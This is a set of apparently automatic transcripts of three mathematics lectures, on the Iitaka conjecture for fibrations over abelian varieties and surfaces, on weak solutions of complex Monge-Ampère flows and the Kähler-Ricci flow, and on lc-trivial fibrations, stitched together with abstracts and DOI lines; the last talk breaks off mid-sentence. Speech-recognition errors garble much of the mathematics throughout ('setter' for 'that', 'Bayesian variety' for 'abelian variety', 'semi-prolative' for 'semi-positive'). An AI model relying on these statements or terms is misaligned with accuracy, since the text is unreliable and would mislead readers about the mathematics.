total space Y, such that once we calculate the curvature of it, it will be semi-positive in the sense of current on the total space Y. And so now I will explain two propositions, which will be crucial in the proof of our results. So for the first proposition, it is that still under this condition here, still under the construction here, one proposition is that later, let you be some open set in Y, not necessarily in Y1. Be some open set, topological open set in Y. Therefore, the curvature of the determinant of the draft image here is identically equals 2 0 on U. So in this case, in fact, we can prove that for the draft image here, with respect to H, it's Hermitian flat. It's a Hermitian flat vector bundle. Vect bundle on U, not only on U intersect with Y1. I think that I don't have enough time to explain the proof. So I just explained the idea of the proof of proposition 1. In the case 1, H is smooth. In this case, for the proof, it's very simple. If H is a smooth Hermitian matrix, say in this case, it's rather entry. So in this case, it's very easy to see. It's very elementary to see that for this draft image here. Yes, it's just equals to the trace of the curvature. We have this one on U intersect with Y1. And now we assume that for this one, it's identically equals 2 0. So here we know that in the case 1, it's smooth. So here in the case 1, H is smooth. We know that in the case 1, H is smooth. So we know that since to the root of my head, Takayama, we know that for the draft image curvature here, it's semi-prolative in the sense of graph. So for this one, it's semi-prolative matrix. And if the trace equals to 0, so that's where you imply set. And the source sets will imply set for the draft image here. Should there be Hermitian flat? Are you intersect with Y1? And after set by using a little bit more argument, we can prove that it's in fact a Hermitian flat on the total space U. Since here, it comes from the draft image here. So I have no time to explain the last one. And so to prove our result, we need also another proposition, which is essentially proved by Fievega. And also we follow a proof of 2G, which says that the following is so in the talk of Mihai, so we know that in the talk of Mihai, he proved that if the direct image of relative kind of kind of plane is not equal to 0, say in this case, he proved that set for the relative kind of plane, kx over y, it's considered effective. That means that we can find a possible singular matrix such that it's semi-prolative in the sense of current on x. But for the following proposition here, in fact, so in the proposition 2 here, in fact, we want to compare the productivity of the relative kind of bundle and the direct image of the relative kind of bundle. So the proposition 2 says that in fact, the probability 2 says that in fact, so for the relative kind of bundle here, it's in fact more positive than the direct image. So that's as follows. So still in this setting, say in this case, we can prove that we can find some small epsilon positive, which depends on m. And some divisor on x such set for such set of so forth, this divisor here, it's in fact very small. It's in fact, it's all for co-dimension, complex co-dimension at least a 2 at least a 2 in y. And more importantly, we can prove that for the relative kind of bundle plus e. It's much bigger than the direct image. That means that it's much bigger than the. So for the direct image, it comes from the base. So we need to take the determinant of this one. So now this one becomes a lambda on the base. And we prove back it on the total space x. So for here, it's a class in on x such that it's considered effective on the total space x. So in particular, for this one, it's a big line bundle on the base. So therefore, the progression implies that for the relative kind of bundle, model since modifies here, it will be straight and positive in the horizontal direction. And so that's the population too. Now I'll explain the proof of our loss. In fact, for the divisor e here, it's in fact harmless because of the factor set for its image on y is of co-dimension into when we prove the itaqa conjecture, it's either to get rid of this divisor e. So now for the third part, I will explain the proof of our theorem. So we talk about the results in two cases. So for the first case, we let P be a vibration between two projective manifolds. And in the case, we first explained the case 1, y is a Bayesian variety. So in this case, we want to show that, so in this case, we need to prove that for the co-dimension of x, y is much bigger than the colloidal dimension of the fiber. Because in this case, y is an Bayesian variety. So for the colloidal dimension of y is equals to 0. So that's namely, we want to construct a lot of sections in the direct image for this one, which is just equals to since y is a Bayesian variety, so we know that it's kind of complicated as trivial. So it's just equal to this one. So it's going to say that once we can find a lot of global section here, so for this one, it's just equal to x minus x. So it's therefore to prove the eta connoisseur, in fact, we just want to find a lot of global sections on the direct image here. So here, we have already, thanks to the lot of time, we have already no setter. We can find a simple matrix on it. So now we want to construct a lot of global sections. So for the step one, in fact, we need a simplification. In fact, we can assume that in fact, in the step one, we would like to show that we can assume that y is a simple torus. It is a simple torus. That's just a means that there is no structure sub torus in y. Why we can assume this one? So for the reading, you said in fact, for this inequality, it's in fact, in fact, for this inequality, it's in fact invariant after finite eta cover. That means that if we take some y theta, which is a finite eta cover, which is mean setter sub torus 1, it's a finite eta cover and no ramified locus. And here it's the product. If we can prove that inequality, for this vibration, say in this case, it will imply that we have also the inequality on this vibration. So for this fact, it's well known. So you want to increase the possibility? So we assume that it's a finite eta cover. Yeah, but you want to increase the possibility? No, no. So since there is no ramified locus, so for the collier dimension of this one, it's because all the collier dimension sequence sets. Yeah, so it's literature. Yeah, so by reading this route, so by using this route, we know that y is not simple. It's not a simple torus. So in this case, it will imply that, say in this case, by Bronga's reductive theorem, it will imply that after some finite eta cover, after some finite eta cover, so for example, once y is a torus, after some finite eta cover, it's also a torus. So for the collier dimension, it's sort of weird. We can assume, if it's not a simple torus, say in this case, after some finite eta cover, we know that y can be written as the product of two torus. There are two sub-torus in y. And so in fact, in this case, we can prove that, and once we have this route, so in this case, for the fibrous here, we have another projection to another torus setter. So in this case, for the inequality here, we can prove it by the induction on the dimension of the base. So we can prove the inequality here. Can be proved by induction on the dimension of y. Yeah. So for the advantage of this construction here, setter. So for the advantage of this construction here, setter. So the advantage of this construction here, setter, in fact, in this case, once y is a simple torus, say in this case, for every pursuit effect of lambda on y, there is only two possible cases. So the advantage of this one is setter. If y is a simple torus, in this case, we can easily prove that if y is pursuit effective for, say it will imply the setter y, if it's a pursuit effective lambda on y. So in this case, it will imply setter is y, where the topological true lambda sets mean setter, if C1 plus equals to 1. Or there is ample. So for this one, it seems quite easy to check. But I have no time to explain it. So sets the advantage of this assumption. So now for step two, now we can use. So now for step two, we can use the result of behind the takayama. So in this case, by the result of takayama, we know setter for the black image of this one. By applying their result, we know that it's positively curved on y1. And also, we know setter by using the result of Rufi. We know setter for the determined window. It's semi-political in the sense of current on the total space y. And in particular, we know setter for this one, it's pursuit effective. And now by using this route, we know setter for this pursuit effective window, it should be whether it equals ample or its topological attribute. So setter for the determined. Setter for the determined. It's topological attribute or ample. So now there are essentially two cases we need to check. Now step three, we check the case of when it's topological attribute. If the determined window is c1 class equals to 0, if it's topological attribute, say in this case, since for this current, you see in the class of this determinant. And for this one, it's equals to 0. So for semi-political current, it's equals to 0. So in this case, it's identically equals to 0. So that means setter. So for this one, for the determinant, this one, it's better identically equals to 0 on the total space y. So now we are in a position to apply proposition 1. Now by using proposition 1, we know setter for the direct image here, it's in vector Hermitian flat. It's a Hermitian flat vector bundle on y. Once we know that it's Hermitian flat vector bundle on y, since y is an Abellion variety, we know setter. Since y is an Abellion variety, we know setter. So for the fundamental group of y, it is also Abellion. So in this case, once it's representation, it's in the unitary group. So therefore, since for the fundamental group, it's Abellion, we know setter. We know setter. We know setter in fact. For the direct image here, it can be split as the direct sum of numerical trival and bundle on y. So here, r is the rank of the direct image. So by using this variety, so here we use the factor setter. The fundamental group is Abellion. And so we are, they are numerical trival. So how many times I have? I'll take a minute. Yeah. So once we know this, we have to solve the setter. So by using a route of Kampana, Kampana and Paternela. So by using a route of Kampana and Paternela, which based on a route of Simpson, we can easily prove that for the, since for the direct image here, we know that it's in fact a numerical trival. And by using a route of Kampana and Paternela, we can prove that we can construct a lot of global sections. So setter will imply setter for this one. It's much bigger than this one. So I have no time to, so I'm sorry. So for the last set, I have not enough time to explain it. But it's essentially based on a route of Kampana and Paternela. And now I explain the last step. And so for the step four, we have already explained setter for the direct image here. Since we assume setter, why is it simple to us? So for the determinant of direct image, it's equals to a topological trival lavender or an ample lavender. So in the second part, we use that case when the direct image is ample. Therefore, the direct image is ample. So in this case, because I list also the second proposition, we are throwing the second case, so we need to apply the second proposition. So in this case, by using proposition two, setter will imply setter, it will imply setter for this one. It's it will be very critical. Well, yes, so in fact, as we explained before, so in fact, as we explained before, since the image here is of co-dimension at least two, since for this derisers, it's in fact a small derisers. So in this case, there are the standard, so in this case, there are the standard method to get rid of this small divisor. So for simplicity, we just assume that E is equals to 0. So in this case, that's imply setter. Since this one is ample, so that's where imply setter for this kind of window is political. Yes, it's really political in the horizontal direction. So setter will, and so setter for by using the relative for both and the power, and after setter and together with essentially by using the oscillatory gosh extension theorem, we can prove setter. So for this one, maybe another M, so for M large enough, we can prove setter by using the result and together with oscillatory gosh extension, we can prove setter for this further restructuring map is such a tip. So setter for setter will imply setter. kappa x is much bigger than kappa f. So I have one minute of, yeah, so in the last one minute, so maybe I explained that a little bit of the idea of the proof in case one y is a surface, and one y is a surface, and one y is a surface, and one y is a surface. In fact, in this case, it's quite easy to check setter for the collinear dimension. It's an imagined random number after birectional equivalent. So in this case, we can run the MMP on y. So therefore, in particular, we can assume setter for the kind of window of y is semi-ample. And in this case, in the case, if the collinear dimension is much bigger than when, then in this case, it's well known due to the relative of Flegger. So the only interesting case is in the case when the collinear dimension of base is equals to 0. So in this case, so after some finite a dot cover, since we assume that it's minimal, then in this case, we know that y should be a torus or k-3 surface. In the case 1, y is torus. It's already proved. And in the case 1, it's a k-3 surface. So in this case, we still, and so therefore, we still studied the direct image here. And we know that for this one, it's a pseudo-effective lambda on y. And in the case 1, y is a k-3 surface. So in this case, we know that if y is k-3 surface, it's k-3 surface. And 1, y is pseudo-effective by using the Savatsky decomposition and by using the Karmata-Flegger vanishing theorem and the He-Man-Rohlker. It's easy to check that for the collinear dimension of y, should be equals to the numerical dimension of y. And in the case 1, the collinear dimension of y is at least 1. So in this case, by following almost the same proof as here, we can prove the Idyac furniture. So the difficulty case is in the case 1, the collinear dimension equals 2, 0. So in this case, that just means that so for the collinear dimension of this one, equals 2, 0. So that's the difficult case. But in this case, by using the Savatsky decomposition, we know that for the direct image here, it should be equivalent to the sum of some exceptional locus. So it's an expression of divisor. So for this one, it's in fact the minus y rational curve. And by using a lot of compana, we can prove that we can in fact prove that for the fundamental group for outside the exceptional locus, we'll be very simple. So by following almost the same proof as in step 3, we can also prove the Idyac infinity. So that's the finished proof. Sick. Thank you.
|
Let f:X→Y be a fibration between two projective manifolds. The Iitaka’s conjecture predicts that the Kodaira dimension of X is larger than the sum of the Kodaira dimension of X and the Kodaira dimension of the generic fiber. We explain a proof of the Iitaka conjecture for algebraic fiber spaces over abelian varieties or projective surfaces.
|
10.5446/53776 (DOI)
|
Thank you. I'd like to thank you for attending the picture. I'm very excited for giving me this opportunity to speak here. So I will report on a recent joint work with Wang Qinlu from Hasei and with Amit Zariaï from Toulouse, who is in the audience. And we are trying to develop the first steps of a parabolic, very potential theory. So we have posted two papers on the archive last October. Both are quite long and a bit technical. There are close to 60 pages each. So I'm not going to explain all of them by far. But I will try to focus on one of them that deals with the compact setting, which is a bit easier to explain. And so what we try to develop is to understand complex mojampere flows, especially the case of the Kele-Arichi flow, by means of very potential techniques. So we try to define and understand the weak notions of solutions to these flows. And there are basically two natural approaches. So one is by approximation by smooth flows and developing a priori estimates. This is the path I'm going to try to explain today. And another one, which is quite useful as well, but maybe a bit more technical to explain, is by means of Péran technique of envelope of weak sub-solutions. So this one I will skip today, but the inspiration nevertheless lies behind what I'm going to explain. So the main motivation is the study of the Kele-Arichi flow, which you can write like this. And we try to understand this evolution equation, not only at first on smooth manifolds, but you try to run it for as long as you can and then try to extend the definition of the flow as soon as you reach finite time similarities. And very soon you need to understand this object on a mildly singular varieties. And actually it's quite common to study the so-called normalized Kele-Arichi flow, which can be written that way. Where lambda is a real parameter with sign with this way of writing things is the same as the sign say of the first-gen class of the canonical bundle of the manifold. So if you pick, maybe I should write here that at the level of homology classes, so if you write alpha t, which is the homology classes of those scalar forms theta t, then alpha t dot solves a very simple ODE, namely that maybe I should write that way. Alpha t dot is given by this. So you are from there and from the initial Kele-class that you give yourself, understand that alpha t is a definite and simple form. So we can pick, maybe I should write it here, a smooth representant of this form in alpha t, a fixed class, and then solving this nonlinear equation turns out to be equivalent to solving the following complex monjamper flows. So n will be the complex dimension of the manifold. Where dv is a fixed volume form on the manifold, h is a smooth and fixed function, and phi t is the unknown function, which is assumed to satisfy the following positivity property. So it's a well-known fact that which is a particular to Kele geometry that solving this Kele version of the Ricci flow or the normalized version is actually equivalent to solving a complex monjamper equation at the scalar level. So rather than having an unknown tensor, you actually end up with trying to find and solve an evolution equation for some unknown function, scalar function. So that's the kind of equation I'm going to focus on. But as I mentioned, it's also extremely important to understand this type of equation on mind-leasing larvalities. So the precise setting will be the following. So let's assume that the underlying variety is actually might be singular. It still makes sense of considering such an evolution equation. And in order to understand the corresponding complex monjamper flow, we fix a resolution of singularities and lift the problem to the smooth manifold x, and the corresponding flow transforms into, let me write this notation for complex monjamper flow, transforms into the following type of equation. So f looks similar to what we had before. So let's take some function h of t of x plus lambda phi of t. So this hasn't much changed. So the new, or maybe h tilde, there is a new guy here, g, which has the following form. And the zeros, so these are homomorphic sections of some line bundles, and the zeros of those guys actually corresponds to the nature of the singularities you started with. So we have defined both poles and zeros for this density, but the important point from an analytic point of view is that you nevertheless end up with a density g, which is LP integrable, and this is one possible meaning for the fact that the singularities you are dealing with are might. So the next one, the difference is that you have lifted here, omega t is actually the lift of some eta t. So eta was the caliform on the manifold v, but so omega t is no longer strictly positive, it has some degeneracies above the singular locus of the manifold you started with. So you have a lack of positivity on the reference form, and you have also some analytic difficulties coming from this density g. So in the sequel, I will focus on this general form of the complex mojampere flows, and I would like to make sense of weak solution to this flow in the sense of pre-potential theory. So rather than working on the manifold x, the first hint that we follow is that we work on the manifold xt, which is a real manifold of dimension 2n plus 1. So this is the maximal existence time for this flow, and this is a real manifold of dimension 2n plus 1. And we want to understand this equation on xt. So we are going to interpret both sides of the equation as positive measures on xt, and trying to make sense of this both left hand side and right hand side in the sense of measures. So the left hand side is the easiest one to deal with, namely the only part you need to understand, or somehow the delicate part you need to understand is this one, which is a complex mojampere operator, which has been studied in the late 17th by Beethoven Teller. And they propose a very convenient definition of the complex mojampere operator. And as soon as, say, for all t, the map x goes to phi t of x is omega t paracelonic and bounded. So I assume that my object here, I will impose that they are locally bounded, and I want to impose that they have some pruricic bombacity property, which means that, so definition, phi t is omega t paracelonic. And if and only if, if you write locally omega t is i dd bar of some guy, say ut, then phi t plus ut is a pruricicobamonic function. So the first condition we impose is that this function phi of t and x is, you can think of it as a bounded family of omega t paracelonic function. And if you do so, then by Beethoven Teller theory, this is well defined on x for each fixed t as a positive measure, and then you average this with respect to the big measure in time, and you have a nice well defined measure, positive measure on x t. So that's for the left-hand side. And maybe I should emphasize that we have good, very good convergence properties of this operator. So phi goes to dt, which omega t plus i dd bar phi t clear. For example, if you, so I forgot to mention that, of course, in practice, in both in theory and in practice, you can almost never compute this object in reality. What you do is you approximate them by smooth guys, and you want to be able to pass to the limit in the approximation process. So it's crucial in this week's theory that you have reasonably good convergence properties. And here in the Beethoven Teller setting, there are tons of such continuity properties. So if the phi t, for instance, converges, if you have an approximate that converges uniformly, then you can pass to the limit inside this mojant operator. So there are many other properties, but let's stick to this one for the time being. So now I would like, and this is perhaps a bit newer, to make sense of the right-hand side. So what do we have on the right-hand side? Well, something reasonably nice, something that is independent of time, and then there is this time derivative that shows up. So something that is quite natural is that we assume that t goes to phi t of x is, say, locally Lipschitz. So it's uniformly in the space variable. And then dt phi is well-defined almost everywhere, and therefore you can make sense of the right-hand side in the Lebesgue sets. So this is well-defined almost everywhere. So you're plugging the rest of the picture, and you end up with almost everywhere well-defined right-hand side, the density of the right-hand side, and so well-defined right-hand side. So that's first naive observation that you might hope that you will be able to produce estimates so that your objects are indeed locally Lipschitz in time, and we will do so. But it's also a problem that it's not sufficient to pass to the limit in approximation processes. So we actually add for more, namely we wish that our solution have some convexity property in time. So we want that t goes to phi t of x is almost concave, and again locally uniformly in 0t times x. So now if you have, so forget about the semi-concave problem, imagine you have a sequence of concave functions. If they converge pointwise, then you can indeed take the time derivative and you have convergence of the time derivative. So the convergence properties are guaranteed if you can make sure that your object have concavity properties in time. One last remark is that we don't, or we shouldn't, ask for Lipschitz property or concavity property all the way down to time 0, because as you may know, for the heat equation and the same property holds for the Kelel-Ritzchitz flow or complex monjampere flows, those flows have very strong smoothing properties, so you can start from an initial data that is poorly regular, and the flow will have the tendency to smooth out the initial data. So you can, it's natural to expect that you have good regularity in time for positive time, but you shouldn't expect good time, regularity in time up to time 0. So the local here is, you should stop the uniform estimate before time 0. Okay, so that's the definition of the left-hand side, the definition of the right-hand side, and what can we do with this? So the zero end I would like to explain is the following. Assume that capital F is continuous in the three variable. Assume moreover that it is quasi increasing in the last variable, which I will denote by R, so this is F of txR, and locally semi-convex in the last two variable, sorry, in t in R, so these are the assumptions on F. Assume g is in LP, like for instance this example, p bigger than 1, and the set where g vanishes has a volume 0. And finally assume that you pick an initial data, which is omega prosomonic with respect to omega 0, and say bounded to start with. Then there exists a unique phi, which solves the problem with the appropriate regularity, namely, so for all t, x goes to phi t of x is omega prosomic on x, 0 maybe phi is bounded, let me write it like this maybe, you cannot get bounded up to a time t, but it's bounded up just a bit, if you start just a bit before t. Okay, so it's locally bounded, but it's essentially bounded. So second property, t goes to phi t of x is locally uniformly semi-convex. Phi solves the complex-Majan-Père flow equation in this sense I just explained. And finally, phi t goes to phi 0 as t goes to 0, say in L1. So with this type of regularity, and with this definition of weak solution, there is a unique weak solution in this sense of such complex-Majan-Père flows. So capital t is the mean time where omega t is a correct class? Well, actually you give yourself data like this, so it could also be the, you need for f to be well defined as well, so if your data is well defined on this manifold, then you can solve the problem like this. So for the, of course you have in mind that for the Kele-Ritchie flow, capital t will have the tendency to be the maximum homological existing type. Okay, so I would like to explain the proof of this result, but before that I would like to stress, to mention a few earlier works and stress some differences. Maybe one comment, but maybe more for the experts, but the convergence that we've got at time 0 is actually quite strong. So I put the weakest one, it is sufficient to get uniqueness of the solution, but as we will see at some point in the proof, the convergence is in a reasonably strong sense. So in capacity for those who know what it is, are almost by above. So the, or if you start with some phi 0, which is continuous, the convergence is actually uniform. So there are strong information on what happens at time 0. But for the, this statement, especially for the uniqueness, which is quite delicate, L1 convergence at time 0 is sufficient. There's one comment on previous works. And that's actually motivated this one. So first there has been an important work by Song and Tian. It has been published only recently, but the paper goes back to 10 years ago. They developed weak solutions in similar contexts, but asking for the manifold V to be algebraic. There is a projectivity assumption in the process that is actually unnecessary. And perhaps more importantly, they prove strong reliability on the regular part of V. But since this is very demanding, the method is not very flexible. So besides the fact that it's natural to expect that this kind of techniques will be applicable in the Kehler context, more importantly, the techniques that they propose, which are quite interesting, produce stronger results, can be obtained, but brings techniques that are not very flexible. So it's important to develop software tools. And this is something we have been doing with Philippe Essidieu some time ago. And with Amedzariah. And I should also add that part of the work was completed by our PhD student, Thau, the last few years. And in these works we have developed parabolic viscosity theory. So rather different approach producing weak solutions as well. And here the drawback is that we need to assume, maybe with these notations, that there is a G missing, no? It was here, maybe. So we need to assume that the density G that I was mentioning, for the viscosity technology to work, we need data that are continuous. And in particular, the density that causes some trouble has to be continuous, not LP, a bit more demanding than that. So for instance, for the application to the Kela-Rachie flow, or the study of the Kela-Rachie flow, it implies that the singularities that you can deal with are canonical. And there is an important class of singularities that show up in the minimal model program, the so-called terminal singularities, that are not covered by this approach. Why the one that we propose today applies to the most general singularities encountered in the classification of a G-Rachie meter. And finally, a last comment on previous works, so they have been worked by many authors. Let me maybe mention a work by Peter Topping in the few years ago, and definitive work by Dinezza and Lou, which essentially shows that you can start from a very arbitrary initial data. So the initial data, which I denoted by phi 0, can be almost arbitrary. The presentation here I asked for the initial data to be bounded, but you can extend this hypothesis by far, and this is a work that Eleonora and Chinlu have done. So this could be also done here, but it brings some extra difficulties that we hide under the carpet. Okay, so the goal now is to give you a few hints on the proof of this result, and the technique, it's not a surprise if you've been following carefully the lectures by Gabor. You approximate by smooth flows, and you try to prove a prior estimate. So that was the main hint in Gabor's first lecture. And this is exactly what I propose to do. So let me write it that way. Assume you have this following question. Let us assume just for now that omega t is scalar, a whole new scalar form, that f is a smooth function, and that g is a smooth and positive function. So in practice, it means that you will have indices, approximations, and that fj will be a family of smooth function uniformly convergent towards the f, which is merely continuous, that omega t will be omega tj, omega t plus some extra positivity factor, etc. etc. But the notation will be awful, so I skip that, and I focus on proving a prior estimate for this approximate, without too many indices. So the first claim, so the claim will be that first in this context with the initial data phi 0, then phi of tx is uniformly bounded, maybe on 0t minus epsilon cross x. Second, that t times dt of phi will be bounded by yet another constant. And lastly, that the second time derivative is also under control. So in the following way, t square times d double dot t is less or equal than the third constant on 0t minus epsilon dot x. So that's the goal. And once again, you should imagine that there is an index, an extra index j that you are approximating, and of course in the statement, all the constants that you end up with are actually independent of j. So how to prove that? So we try to give some hints. So maybe let's have a look at the first, which is the easiest estimate. And it relies on Yao's solution to the calabic injector plus some extension due to colloj and a paper that has already appeared in previous lectures, and then you pick a function, or maybe I should write some notation. So you fix some uniform bound. So I haven't been precise on what are the assumptions on the family of forms. And the precise assumption that we actually need will show up for each app you estimate. So for the first one, we need to have a uniform lower bound, uniform in time. It just depends on x. It just depends both on time and space variable. This depends on x. So you can bound from above this family of semi-positive form by a fixed caliform that's given for free, that's cheap. But more demanding is that you need a positive lower bound that is uniform in time. And by Yao's solution to the calabic injector, you can fix some potential, rho plus or rho minus, with some respect to this form and bound it such that theta plus minus plus i dd bar of rho plus minus to the n. So the equation, mon-jamper, equals gdv. So this you cannot exactly do because of mass constraints, but you can adjust by a fixed constant here, which guarantees that the mass of the left hand side and the mass of the right hand side are the same. And once you do that, there is a unique such solution up to normalization. So for the plus, this is really Yao's solution for the minus because here the form has the tendency to degenerate. It's not really a killer. This is essentially the work that was mentioned by Koalje and IgZ. So if you do that, then you observe, for instance, that u plus of t and x, which is rho plus of x plus ct plus 1, is such that it's actually greater or equal than phi t of x. So that's what you can do, basically. And let me say one word to how to justify this. So what we can observe is that due to this inequality, phi t is a sub-solution to the flow, to the following flow, plus plus ddc v to the m dt is e to the dt v plus f tx v gdv. So actually, the point is that theta plus plus ddc phi t to the m because theta plus is a bit more positive than omega t. This is greater or equal than omega t plus, or sorry, I tried to avoid ddc since the beginning, but they catched quickly up. So you have this inequality. This is the equation satisfied by phi t. And now, okay, so that's the first observation. So phi t is a sub-solution for this monjamper flow. And now you compare to the fact that u plus, the claim is that u plus is a super solution to this flow. If c is large enough. So I leave that as a computation. And then you apply the so-called comparison principle. Once again, we are working with smooth approximations. So it's a classical maximum principle that you plug in here, which tells you that as the names suggest, the sub-solution is smaller or equal than the super solution. So I'm running out of time. So I will skip the Leap Sheets estimate, which is a bit tricky, but I would rather say one word about the last one, which is probably the newest of the three estimates. And maybe let me give a proof of this when under simplifying assumption, namely, I will assume that f is zero. It simplifies a bit, but it's still a bit technical. So I will assume moreover that omega t is given like this. So it's a fine. And in this case, the claim can be made, the estimate is even better, namely that t times the second derivative of phi is less than n. So it's a very precise estimate on the second time derivative. And why that? So set h of tx, sorry. So in this case, if I under this simplifying assumption, you can get rid of the square. So consider t times, let me use dot notation to simplify my life. Consider this and t0 x0, where h reaches its maximum. Either t0 is zero and then you're done. Or let me assume, maybe here, that t0 is positive. Then I claim that if you apply the following heat type operator to the function h. So s t is omega t plus i dd bar of phi t. Then this is less or equal than phi t double dot minus t divided by n phi t double dot square. So that's the important and slightly tricky computation. But let's assume that for a while. And then look at what happened at this time t0 positive and x0. Then at that point, this operator applied to i h should be a negative, which tells you that if you multiply by t0, this quantity, t0 phi t double dot minus t0 phi t double dot square divided by n, is less or equal than, sorry, is positive. Therefore, this quantity, no, that's okay. What is missing? No, so this is non-negative, I multiply by t0 which is positive and I end up with that. And this, you can send this guy on the other side divided by t0 phi t double dot and you end up with what you wanted. Is it n or no, no, no, no, no, no, yeah, okay. So I was planning to give you the full tricky computation, but pull you, I'm running out of time, so you will miss that. That was the funniest part of the story. Okay, how much time do I have, Daniel? Five minutes, yeah. So I will skip that because I need more than five minutes. So where are we? Here are the estimates. So let's pretend we have a full detailed proof of this. And now remember that we are actually arguing by approximation and we have this kind of information. So for each j, phi j is a solution of an approximation flow and we have this kind of estimate on phi j. Then first observation, families of quasi-prosthumatic functions, if you understand well the negative part of the curvature, are weakly compact in the L1 topology. So this first bond tells you that you can extract convergence subsequence, say in L1 sense, in a poor sense. Then, as I said, if you go now down to the third one, the second and the third one tells you that those families of approximants are locally leapshipped in time and furthermore, essentially, concave in time. So you can pass to the limit in this weak sense but also pass to the limit in the time derivative, thanks to the concavity. So where is my flow? It has disappeared from the board? Yeah. Well, did you say? It is hiding, no? No. Okay, so let me just rewrite that. Okay. Oh, thanks. Here it is. So what I just said is that here, on this right-hand side, we can pass to the limit, thanks to this information. And I cheated a bit at the beginning saying that we have tons of continuity results for the Mongeampere operator. There is one that we haven't got, is that it's not continuous along L1 convergence. So we need some extra information on how, if we extract here in the L1 sense, how this converges toward the limit. So, if you look at the equation that these approximants are solving, what you get here is the Mongeampere of the approximants are given by a density times the bake. And the densities are essentially uniformly bounded from above, thanks to the Lipschitz estimate. In that setting, we have strong stability results for solutions of a Mongeampere equation, and we can prove that actually it's not L1, but actually converges in the L infinity sense. So the approximants uniformly converge towards the limit. And therefore we can pass to the limit and produce a solution. With some extra minutes that I haven't got, you can apply this for instance to the long term behavior of the Kedavitchi flow on singular Kala-Biaux varieties, and get in a few lines that the flow deforms any initial data towards a singular Kala-Biaux metric that Gabor is trying to understand better for us. Thank you.
|
We develop a parabolic pluripotential theory on compact Kähler manifolds, defining and studying weak solutions to degenerate parabolic complex Monge-Ampere equations. We provide a parabolic analogue of the celebrated Bedford-Taylor theory and apply it to the study of the Kähler-Ricci flow on varieties with log terminal singularities.
|
10.5446/53780 (DOI)
|
So, thank you very much for the invitation. I will talk about a joint work with Vlad Lazic. So, I'll start with an introduction of all the objects. In this talk, we'll have x and z projective normal and complex varieties. But more than in varieties, I'm interested in pairs. So, I'll just briefly recall you what a pair is. It's the data of a variety and a val divisor. So, it will be with rational coefficients for us today. And together, they have the property that kx plus b is q-card here. And, okay, if you're used to pairs, maybe you can notice that here, I'm not assuming that b is effective. Okay. Okay. In the objects I study are called klt or lc trivial vibrations. So, this is an notation f from x, b to z. They are the data of a pair, a vibration. So, f is a connective morphism, with connected fibers. And so, the crucial condition is this one. There exists q-card here, divisor d on z, such that kx plus b is the pullback of d. And then there are some technical conditions. We assume x, b to be respectively klt or lc. So, lc has already been defined, but let me just recall that. So, klt for Kavamata, log terminal, and lc for log canonical are regularity conditions. And they are regularity conditions that can be checked on the coefficients of b, on a suitable variational model of x. And let's say that if x is smooth, and b is simple normal crossing, then they become, so lc. So, we write b as the composition of its reducible summands. And lc becomes bi at most one for i and klt. So, we have the same inequality, but strict. Okay, and then we have another condition, which I will not tell. So, it's a... You're calling klt what is usually subklt? Yes, because my pairs are what is usually called sub pairs. So, I'm just throwing the sub away. Yes. Yeah, and then we have this other technical condition. I will not tell you what it is, but I'll tell you what it does. It makes b behave almost as an effective divisor. b is almost effective. So, four and five are technical conditions. What makes these vibrations special is condition three. So, for instance, if b is equal to zero, and if you restrict to a general fiber, you can see that a general fiber has trivial canonical. So, this is a restriction on the geometry of the vibration and of x. Okay, maybe some examples. So, the first example I want to give you is the one of relatively minimal elliptic vibrations. So, what does it mean? It means that x is a surface, a smooth surface, and c is a smooth curve, and the general fiber is an elliptic curve. So, this is an elliptic vibration and relatively minimal means, just right here. Relatively minimal means that there are no minus one curves inside the fibers. So, if f is a relatively minimal elliptic vibration, then f from x, zero to c is a KLT trivial vibration. So, this is an elliptic vibration and relatively minimal means that there are no minus one curves inside the fibers. Okay. Okay. The second example, for the second example, we're going to take x p1 cross p1 and we take D, a divisor of B degree, let's say Dk on x. Then the second projection, so from x and then I take as boundary 2 over D, D to p1, maybe D reduced. And I want also maybe D at least 2. So the second projection is NSE trivial integration. So these two examples show two very different situations. The first one where the fiber vary, maybe the fibers are not all isomorphic. And then the second situation where the fiber doesn't vary at all. So it's a product, but the interesting geometry is given by the boundaries. So the points that move in the fiber. Okay. Maybe I can convince you that this is a KLT trivial vibration. These kx plus 2d has B degree. So the canonical, it's minus 2 minus 2. And then D, it's Dk multiplied by 2 over D. So it's 0 minus 2. So it's a pullback from the base. Okay. So now we consider an S-triva vibration. And we define an object called the discriminant. So it's defined by a formula. Let me write the formula and then I'll tell you what it is. So it's a sum over the irreducible and reduced sub-varieties of what I mentioned one of z of some coefficients, 1 minus gamma p times p. And now gamma p is again defined by a formula. So we take the soup over all the non-negative real numbers such that this pair, is LC over the generic point of p. Okay. So what is this? So LC, we've already said that it's a regularity condition. Let's say for simplicity, the coefficients of Delta b plus t times the pullback of p. Let me write Delta as sum of Di Delta i. Okay. And then over the generic point of p, means that I check the this condition only on the Di such that the Delta i surjects exactly on 2p. Okay. So maybe this is not super clear yet. But I'll just tell you some properties first. So facts, Vz is a cubile divisor. So this means that the sum is finite. And the gamma p's are rational numbers. And then there is another important property proved by Ambro, saying that if Kz plus Pz is Q Cartier, and B in the boundary is effective, then the singularities of B, so R appear exactly in the singularity of the pair Z, Vz. So this manifestation of the inversion of a junction, which has been already mentioned. And then maybe I want to say two words on actually what is this? What is this? So if you don't like the formula, what does it mean? So let's say that gamma p equals 1. So gamma p equals 1 means that this pair, x plus the pullback of p, has the regularity condition locanonical. So it is regular in the category of regularity that we have chosen. And if gamma p is less than 1, then the same pair is, let's say, does not have this regularity condition, then it's more singular. So we can look at this support of Vz. So this is the union of all these, could I mention one subvarieties such that this pair is singular. So it's a sort of singular locus of F, but seen from a pair to a variety. So this discriminant detects the singularities of F. Okay. And now I can introduce another object called the moduli part. This is defined as D minus Kz minus Bz, where let me recall that D is the one from the definition which is still on the board. This guy. Excuse me. Can you find the two dimensions? No, no, no. This is a good point. Yeah, just to divisor your part. But in a second, I will tell you a result which says that maybe under some special condition, at some point it says everything. And actually, you already have the right condition on the board. Okay. So before telling you the properties of M, I would like to do a small construction. Let's say that we have here a, so F and SC trivial vibration and we consider a barational map. Then we can take the singularization of the fiber product and it comes with two natural maps. We call them F prime and tau. And then I want to define a boundary on X prime just by setting this equality to be true. So with this boundary, F prime is an SC trivial vibration. And therefore, it has a discriminant and a moduli part. And this will be, so when I take a base change, these two implicitly denote discriminant and moduli part of the vibration obtained with the base change. So what makes the moduli part special is the following result. It has been proved in different extent of generality by many people. So, ambro chevamata collar and Fugino and Gogno. So we consider an SC trivial vibration. Then we can find a barational map such that, so first, Kz plus Bz is Q Cartier or equivalently M is, Mz is F. And every 